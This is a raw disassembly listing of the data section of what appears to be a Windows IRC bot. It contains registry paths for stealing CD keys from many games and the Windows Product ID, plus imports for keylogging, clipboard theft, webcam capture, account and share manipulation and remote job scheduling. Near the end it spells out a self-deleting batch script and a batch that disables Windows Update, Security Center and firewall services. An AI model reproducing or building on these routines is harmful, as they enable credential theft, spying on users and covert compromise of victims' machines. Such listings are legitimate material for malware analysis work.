db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 4
aSerialnumber db 'SerialNumber',0
align 4
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 4
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 10h
db 53h
aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 10h
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 4
aNascarRacing20 db 'Nascar Racing 2003',0
align 10h
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 4
aNascarRacing_0 db 'Nascar Racing 2002',0
align 10h
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 4
aNhl2003 db 'NHL 2003',0
align 4
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 4
aNhl2002 db 'NHL 2002',0
align 4
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 4
aFifa2003 db 'FIFA 2003',0
align 4
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 4
aFifa2002 db 'FIFA 2002',0
align 4
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 4
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 10h
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 4
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 4
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 4
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 10h
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 10h
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 10h
db 53h
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 8
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 10h
aGlobalOperatio db 'Global Operations',0
align 4
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 10h
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 10h
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 10h
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 10h
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 10h
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 4
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 4
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 8
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 10h
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 4
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 10h
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 10h
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion',0
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 10h
aCustomernumber db 'CustomerNumber',0
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 10h
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 4
aTheGladiators db 'The Gladiators',0
align 4
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 10h
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: .text:00427F0C�o
aCdkey db 'CDKey',0 ; DATA XREF: .text:00427F08�o
align 10h
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: .text:off_427F04�o
align 4
asc_429118: ; DATA XREF: sub_408503+E7�o
; sub_408503+F2�o
unicode 0, <=>,0
aR: ; DATA XREF: sub_408503+8F�o
; sub_40CD3A:loc_4110F8�o
unicode 0, <r>,0
aSS_3 db '%s\%s',0 ; DATA XREF: sub_408503+7E�o
; sub_4087CA+45�o ...
align 4
aSCdKeyS_ db '%s CD Key: (%s).',0 ; DATA XREF: sub_408503+2B�o
align 4
unk_42913C db 2 ; DATA XREF: sub_4086B2+C5�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFilesFoundD_ db ' Files found: %d.',0
unk_429170 db 2 ; DATA XREF: sub_4086B2+5C�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2Eh ; .
db 6Dh, 1Fh, 64h
db 1Fh
db 6Ch, 20h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForFi db ' Searching for file: %s.',0
align 4
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_4087CA+107�o
align 4
aS_3 db '%s\*',0 ; DATA XREF: sub_4087CA+1A�o
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_40891C+C50�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_40891C+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_40891C:loc_409557�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40891C+BE6�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40891C+BD9�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40891C+BCC�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40891C+BBF�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40891C+BB2�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40891C+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40891C:loc_4094B9�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40891C+B68�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40891C+B60�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40891C:loc_40946F�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40891C+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40891C+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40891C+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40891C+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40891C:loc_4093FB�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40891C+AAA�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40891C+AA2�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40891C:loc_4093B1�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40891C+A60�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40891C+A58�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40891C:loc_409367�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40891C+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40891C+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40891C+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40891C+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40891C+99A�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40891C+98D�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40891C+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40891C+973�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40891C+966�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40891C+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40891C+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40891C:loc_40925C�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40891C+903�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40891C+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40891C+8EE�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40891C:loc_4091FD�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40891C+8B4�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40891C+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40891C+835�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40891C+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40891C+81B�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40891C+80E�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40891C+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40891C+7F4�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40891C+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40891C+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40891C+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40891C:loc_4090DD�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40891C+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40891C+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40891C+66E�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40891C+661�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_40891C+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40891C+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40891C+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_40891C+62D�o
; .text:0042C5DC�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40891C+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40891C+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40891C+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40891C+5F9�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_40891C+5EC�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_40891C+5DF�o
align 4
aSend db 'send',0 ; DATA XREF: sub_40891C+5D2�o
; sub_40CD3A+2035�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_40891C+5C5�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_40891C+5B8�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_40891C+5AB�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_40891C+59E�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40891C+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40891C+584�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_40891C+577�o
; .text:0042CA90�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40891C+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_40891C+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40891C+550�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40891C+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40891C+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40891C+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40891C+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40891C+50F�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40891C+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40891C+4F6�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40891C+483�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40891C+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40891C+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40891C+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40891C+44F�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40891C+442�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40891C+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40891C+428�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40891C+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40891C:loc_408D2B�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40891C:loc_408D03�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40891C+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40891C+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40891C+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40891C+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40891C+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40891C+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40891C+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40891C:loc_408C55�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40891C+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40891C+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40891C:loc_408C10�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40891C+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40891C+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40891C+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40891C+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40891C+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40891C+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40891C:loc_408B7B�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_40891C+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_40891C+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_40891C+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_40891C:loc_408B14�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40891C+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40891C+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40891C+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40891C+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40891C+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40891C+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40891C+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40891C+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40891C:loc_408A51�o
; sub_41EF8E+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40891C:loc_408A24�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40891C+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40891C+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40891C+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40891C+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40891C+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40891C+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_40891C+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40891C+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40891C+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40891C+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40891C+23�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_40891C+A�o
align 4
dword_429A8C dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_4095A9+2F2�o
dd 2029206Ch, 2BBBB02h
aDllTestComplet db ' DLL test complete.',0
align 10h
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+264�o
align 10h
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+160�o
align 10h
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_4095A9+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_409B27+72�o
align 10h
aMirc db 'mIRC',0 ; DATA XREF: sub_409BEC+5�o
; sub_4141DB+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_409C6E+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_409D12+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_409D34+140�o
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_409D34+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_409D34+48�o
align 4
aCA_bat db 'c:\a.bat',0 ; DATA XREF: sub_409EBC+29�o
align 8
a@echoOffEchoRe db '@echo off',0Dh,0Ah ; DATA XREF: sub_409EBC+14�o
db 'Echo REGEDIT4>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT'
db '\Parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TransportBindName"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Share'
db 'dAccess]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuaus'
db 'erv]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>'
db '%temp%\1.reg',0Dh,0Ah
db 'Echo "Start"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableDCOM"="N">>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableRemoteConnect"="N">>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>'
db '%temp%\1.reg',0Dh,0Ah
db 'Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Securi'
db 'tyProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Enabled"=hex:00>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanma'
db 'nserver\parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo.>>%temp%\1.reg',0Dh,0Ah
db 'Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip'
db '\Parameters]>>%temp%\1.reg',0Dh,0Ah
db 'Echo "NameServer"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Domain"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "SearchList"="">>%temp%\1.reg',0Dh,0Ah
db 'Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DeadGWDetectDefault"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DontAddDefaultGatewayDefault"=dword:00000000>>%temp%\1.reg',0Dh
db 0Ah
db 'Echo "EnableSecurityFilters"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AllowUnqualifiedQuery"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PrioritizeRecordData"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "TCP1320Opts"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "KeepAliveTime"=dword:00023280>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BcastQueryTimeout"=dword:000002ee>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BcastNameQueryCount"=dword:00000001>>%temp%\1.reg',0Dh,0Ah
db 'Echo "CacheTimeout"=dword:0000ea60>>%temp%\1.reg',0Dh,0Ah
db 'Echo "Size/Small/Medium/Large"=dword:00000003>>%temp%\1.reg',0Dh,0Ah
db 'Echo "LargeBufferSize"=dword:00001000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "SynAckProtect"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PerformRouterDiscovery"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "EnablePMTUBHDetect"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "FastSendDatagramThreshold "=dword:00000400>>%temp%\1.reg',0Dh,0Ah
db 'Echo "StandardAddressLength "=dword:00000018>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultReceiveWindow "=dword:00004000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DefaultSendWindow"=dword:00004000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "BufferMultiplier"=dword:00000200>>%temp%\1.reg',0Dh,0Ah
db 'Echo "PriorityBoost"=dword:00000002>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IrpStackSize"=dword:00000004>>%temp%\1.reg',0Dh,0Ah
db 'Echo "IgnorePushBitOnReceives"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableAddressSharing"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "AllowUserRawAccess"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
db 'Echo "DisableRawSecurity"=dword:00000000>>%temp%\1.reg',0Dh,0Ah
